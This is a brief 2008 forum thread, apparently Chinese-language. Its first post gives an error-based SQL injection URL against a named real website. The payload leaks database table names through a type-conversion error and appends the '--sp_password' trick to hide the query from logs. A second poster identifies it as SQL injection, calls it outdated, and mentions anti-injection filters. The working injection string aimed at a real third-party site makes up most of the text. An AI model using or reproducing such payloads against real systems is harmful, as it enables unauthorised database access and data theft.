G goddy Unregistered / Unconfirmed GUEST, unregistred user! 2008-03-22 #1 http://www.nanhoo.com/include/soft.asp?ProductID=15%20and%201=convert(int,(select%20top%201%20table_name%20from%20information_schema.tables))--sp_password
http://www.nanhoo.com/include/soft.asp?ProductID=15%20and%201=convert(int,(select%20top%201%20table_name%20from%20information_schema.tables))--sp_password
M menzhe Unregistered / Unconfirmed GUEST, unregistred user! 2008-03-25 #3 对的!SQL注入,不过现在已经流行过去了!有很多的防注射程序!引用一下就成了